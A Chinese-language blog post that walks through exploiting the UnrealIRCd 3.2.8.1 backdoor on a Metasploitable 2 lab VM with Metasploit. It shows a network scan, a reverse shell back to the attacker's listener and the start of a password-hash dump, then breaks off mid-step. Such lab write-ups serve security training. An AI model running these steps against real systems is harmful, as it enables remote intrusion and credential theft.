Sunday, August 23, 2020

對 Metasploitable 2 6667 進行攻擊

msf5 > db_nmap -sS -A 192.168.92.1/24

msf5 > search irc

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > info


       Name: UnrealIRCD 3.2.8.1 Backdoor Command Execution

     Module: exploit/unix/irc/unreal_ircd_3281_backdoor

   Platform: Unix

       Arch: cmd

 Privileged: No

    License: Metasploit Framework License (BSD)

       Rank: Excellent

  Disclosed: 2010-06-12

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.92.129
RHOSTS => 192.168.92.129
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.92.129   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 192.168.92.128:4444 
[*] 192.168.92.129:6667 - Connected to 192.168.92.129:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.92.129:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo BCNTNmWzC7uENOcl;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "BCNTNmWzC7uENOcl\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.92.128:4444 -> 192.168.92.129:54096) at 2020-08-23 08:16:47 -0400

保留 session

ctrl +z

Background session 1? [y/N]  y
msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.168.92.128:4444 -> 192.168.92.129:54096 (192.168.92.129)

使用蒐集密碼檔案 post/linux/gather/hashdump

msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > back
msf5 > use post/linux/gather/hashdump

用已建立的連線




at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

n8n index

 【n8n免費本地端部署】Windows版|程式安裝x指令大補帖  【一鍵安裝 n8n】圖文教學,獲得無限額度自動化工具&限時免費升級企業版功能